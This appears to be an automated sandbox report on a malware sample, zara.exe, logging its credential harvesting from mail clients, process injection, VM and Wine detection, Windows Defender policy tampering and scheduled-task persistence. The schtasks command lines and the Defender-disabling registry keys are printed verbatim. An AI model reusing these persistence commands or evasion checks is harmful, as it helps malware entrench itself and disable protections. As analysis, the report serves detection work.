RegQueryValueExA Feb. 13, 2024, 12:17 p.m.	key_handle: 0x000004f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExA Feb. 13, 2024, 12:17 p.m.	key_handle: 0x000004f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExA Feb. 13, 2024, 12:17 p.m.	key_handle: 0x000004f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExA Feb. 13, 2024, 12:17 p.m.	key_handle: 0x000004f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExA Feb. 13, 2024, 12:17 p.m.	key_handle: 0x000004f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 13, 2024, 12:17 p.m.	key_handle: 0x000004f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 13, 2024, 12:17 p.m.	key_handle: 0x000004f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 13, 2024, 12:17 p.m.	key_handle: 0x000004f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 13, 2024, 12:17 p.m.	key_handle: 0x000004f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 13, 2024, 12:17 p.m.	key_handle: 0x000004ec regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 13, 2024, 12:17 p.m.	key_handle: 0x000004ec regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 13, 2024, 12:17 p.m.	key_handle: 0x000004f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 13, 2024, 12:17 p.m.	key_handle: 0x000004f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 13, 2024, 12:17 p.m.	key_handle: 0x000004f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 13, 2024, 12:17 p.m.	key_handle: 0x000004f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 13, 2024, 12:17 p.m.	key_handle: 0x000004f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 13, 2024, 12:17 p.m.	key_handle: 0x000004f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 13, 2024, 12:17 p.m.	key_handle: 0x000004f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 13, 2024, 12:17 p.m.	key_handle: 0x000004f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OneNote MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 13, 2024, 12:17 p.m.	key_handle: 0x000004f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 13, 2024, 12:17 p.m.	key_handle: 0x000004e4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 13, 2024, 12:17 p.m.	key_handle: 0x000004e4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExA Feb. 13, 2024, 12:17 p.m.	key_handle: 0x000004e4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExA Feb. 13, 2024, 12:17 p.m.	key_handle: 0x000004f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1

Harvests credentials from local email clients (5 events)

file	C:\Users\test22\AppData\Roaming\ICQ\0001
file	C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
registry	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Network activity contains more than one unique useragent (2 events)

process	zara.exe				useragent	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36
process	iexplore.exe				useragent	Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

One or more non-whitelisted processes were created (17 events)

parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\qxo5wa6x.default-release\minidumps\539f6f4a-a0c7-4ede-b970-099eaf599984.dmp"
parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3eef1e8,0x7fef3eef1f8,0x7fef3eef208
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1188,1696133337386392100,11109253583477814292,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=D2DE7855856B6B1869C526FF9558B89F --mojo-platform-channel-handle=1200 --ignored=" --type=renderer " /prefetch:2
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2904 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2144 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3eef1e8,0x7fef3eef1f8,0x7fef3eef208
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1192,14698122105635313534,8896968645334716801,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=8F52B850898E6B109021C900FC19596C --mojo-platform-channel-handle=1200 --ignored=" --type=renderer " /prefetch:2
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3eef1e8,0x7fef3eef1f8,0x7fef3eef208
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2132 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1164,15192878238102625313,8622166048801616827,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=E17FCBB602F9A48B5BE916BCAB6C5B1D --mojo-platform-channel-handle=1172 --ignored=" --type=renderer " /prefetch:2
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3eef1e8,0x7fef3eef1f8,0x7fef3eef208
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1264,15813997844083060191,16272780546978488754,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=8C5DFA1F846549C3894CCD4AE0BFF4B0 --mojo-platform-channel-handle=1276 --ignored=" --type=renderer " /prefetch:2
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=1976 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Local\Temp\\66ba93ae-8a2e-46a0-ac05-4d8dabe04d62.dmp"
parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video

Found URLs in memory pointing to an IP address rather than a domain (potentially indicative of Command & Control traffic) (1 event)

url	http://127.0.0.1

Appends a known multi-family ransomware file extension to files that have been encrypted (4 events)

file	C:\Users\test22\AppData\Roaming\Exodus\exodus.wallet
file	C:\Users\test22\AppData\Roaming\MultiDoge\multidoge.wallet
file	C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\qxo5wa6x.default-release\parent.lock
file	C:\Users\test22\AppData\Local\Temp\firefox\parent.lock

Resumed a suspended thread in a remote process potentially indicative of process injection (50 out of 65 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3028 resumed a thread in remote process 2876
Process injection	Process 3028 resumed a thread in remote process 2128
Process injection	Process 3028 resumed a thread in remote process 2832
Process injection	Process 3028 resumed a thread in remote process 3248
Process injection	Process 3028 resumed a thread in remote process 3452
Process injection	Process 3028 resumed a thread in remote process 3716
Process injection	Process 1216 resumed a thread in remote process 2104
Process injection	Process 1512 resumed a thread in remote process 1864
Process injection	Process 2436 resumed a thread in remote process 1864
Process injection	Process 2140 resumed a thread in remote process 2876
Process injection	Process 3144 resumed a thread in remote process 2128
Process injection	Process 3248 resumed a thread in remote process 3572
Process injection	Process 3412 resumed a thread in remote process 2832
NtResumeThread Feb. 13, 2024, 12:18 p.m.	thread_handle: 0x000002c8 suspend_count: 1 process_identifier: 2876	1	0	0
NtResumeThread Feb. 13, 2024, 12:18 p.m.	thread_handle: 0x000002c8 suspend_count: 1 process_identifier: 2128	1	0	0
NtResumeThread Feb. 13, 2024, 12:18 p.m.	thread_handle: 0x000002c8 suspend_count: 1 process_identifier: 2832	1	0	0
NtResumeThread Feb. 13, 2024, 12:18 p.m.	thread_handle: 0x00000270 suspend_count: 1 process_identifier: 3248	1	0	0
NtResumeThread Feb. 13, 2024, 12:18 p.m.	thread_handle: 0x000002b0 suspend_count: 1 process_identifier: 3452	1	0	0
NtResumeThread Feb. 13, 2024, 12:18 p.m.	thread_handle: 0x000001a8 suspend_count: 1 process_identifier: 3716	1	0	0
NtResumeThread Feb. 13, 2024, 12:17 p.m.	thread_handle: 0x00000340 suspend_count: 1 process_identifier: 2104	1	0	0
NtResumeThread Feb. 13, 2024, 12:18 p.m.	thread_handle: 0x000002a4 suspend_count: 1 process_identifier: 1864	1	0	0
NtResumeThread Feb. 13, 2024, 12:19 p.m.	thread_handle: 0x000000000000014c suspend_count: 2 process_identifier: 1864	1	0	0
NtResumeThread Feb. 13, 2024, 12:19 p.m.	thread_handle: 0x000000000000014c suspend_count: 2 process_identifier: 1864	1	0	0
NtResumeThread Feb. 13, 2024, 12:19 p.m.	thread_handle: 0x000000000000014c suspend_count: 2 process_identifier: 1864	1	0	0
NtResumeThread Feb. 13, 2024, 12:19 p.m.	thread_handle: 0x000000000000014c suspend_count: 2 process_identifier: 1864	1	0	0
NtResumeThread Feb. 13, 2024, 12:19 p.m.	thread_handle: 0x000000000000014c suspend_count: 2 process_identifier: 1864	1	0	0
NtResumeThread Feb. 13, 2024, 12:19 p.m.	thread_handle: 0x000000000000014c suspend_count: 2 process_identifier: 1864	1	0	0
NtResumeThread Feb. 13, 2024, 12:19 p.m.	thread_handle: 0x000000000000014c suspend_count: 2 process_identifier: 1864	1	0	0
NtResumeThread Feb. 13, 2024, 12:19 p.m.	thread_handle: 0x000000000000014c suspend_count: 2 process_identifier: 1864	1	0	0
NtResumeThread Feb. 13, 2024, 12:19 p.m.	thread_handle: 0x000000000000014c suspend_count: 2 process_identifier: 1864	1	0	0
NtResumeThread Feb. 13, 2024, 12:19 p.m.	thread_handle: 0x000000000000014c suspend_count: 2 process_identifier: 1864	1	0	0
NtResumeThread Feb. 13, 2024, 12:19 p.m.	thread_handle: 0x000000000000014c suspend_count: 2 process_identifier: 1864	1	0	0
NtResumeThread Feb. 13, 2024, 12:19 p.m.	thread_handle: 0x000000000000014c suspend_count: 2 process_identifier: 2876	1	0	0
NtResumeThread Feb. 13, 2024, 12:19 p.m.	thread_handle: 0x000000000000014c suspend_count: 2 process_identifier: 2876	1	0	0
NtResumeThread Feb. 13, 2024, 12:19 p.m.	thread_handle: 0x000000000000014c suspend_count: 2 process_identifier: 2876	1	0	0
NtResumeThread Feb. 13, 2024, 12:19 p.m.	thread_handle: 0x000000000000014c suspend_count: 2 process_identifier: 2876	1	0	0
NtResumeThread Feb. 13, 2024, 12:19 p.m.	thread_handle: 0x000000000000014c suspend_count: 2 process_identifier: 2876	1	0	0
NtResumeThread Feb. 13, 2024, 12:19 p.m.	thread_handle: 0x000000000000014c suspend_count: 2 process_identifier: 2876	1	0	0
NtResumeThread Feb. 13, 2024, 12:19 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2128	1	0	0
NtResumeThread Feb. 13, 2024, 12:19 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2128	1	0	0
NtResumeThread Feb. 13, 2024, 12:19 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2128	1	0	0
NtResumeThread Feb. 13, 2024, 12:19 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2128	1	0	0
NtResumeThread Feb. 13, 2024, 12:19 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2128	1	0	0
NtResumeThread Feb. 13, 2024, 12:19 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2128	1	0	0
NtResumeThread Feb. 13, 2024, 12:19 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2128	1	0	0
NtResumeThread Feb. 13, 2024, 12:19 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2128	1	0	0
NtResumeThread Feb. 13, 2024, 12:19 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2128	1	0	0
NtResumeThread Feb. 13, 2024, 12:19 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2128	1	0	0
NtResumeThread Feb. 13, 2024, 12:19 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2128	1	0	0
NtResumeThread Feb. 13, 2024, 12:18 p.m.	thread_handle: 0x0000000000000044 suspend_count: 1 process_identifier: 3572	1	0	0

Uses Sysinternals tools in order to add additional command line functionality (4 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST

Detects VirtualBox through the presence of a registry key (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Detects VMWare through the in instruction feature (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 e9 bb 13 00 00 01 6c 24 exception.symbol: zara+0x2ca1dc exception.instruction: in eax, dx exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 2925020 exception.address: 0x3ca1dc registers.esp: 9895152 registers.edi: 4294940148 registers.eax: 1447909480 registers.ebp: 3992428564 registers.edx: 22104 registers.ebx: 1969033397 registers.esi: 3970698 registers.ecx: 20	1	0	0

Detects the presence of Wine emulator (1 event)

registry

HKEY_CURRENT_USER\Software\Wine

Disables Windows Security features (6 events)

description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection

Executed a process and injected code into it, probably while unpacking (50 out of 220 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Feb. 13, 2024, 12:17 p.m.	thread_identifier: 2768 thread_handle: 0x000001a0 process_identifier: 2764 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000001a4	1	1
CreateProcessInternalW Feb. 13, 2024, 12:17 p.m.	thread_identifier: 2852 thread_handle: 0x000001ac process_identifier: 2848 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000001a8	1	1
NtResumeThread Feb. 13, 2024, 12:17 p.m.	thread_handle: 0x00000224 suspend_count: 1 process_identifier: 2544	1	0
CreateProcessInternalW Feb. 13, 2024, 12:17 p.m.	thread_identifier: 3032 thread_handle: 0x000006e0 process_identifier: 3028 current_directory: C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP filepath: C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP\27Jq3pCQAGfjWkgZSAJ0.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP\27Jq3pCQAGfjWkgZSAJ0.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP\27Jq3pCQAGfjWkgZSAJ0.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000006e4	1	1
CreateProcessInternalW Feb. 13, 2024, 12:17 p.m.	thread_identifier: 2360 thread_handle: 0x00000648 process_identifier: 2596 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000654	1	1
CreateProcessInternalW Feb. 13, 2024, 12:17 p.m.	thread_identifier: 2812 thread_handle: 0x000006d0 process_identifier: 2820 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000006c8	1	1
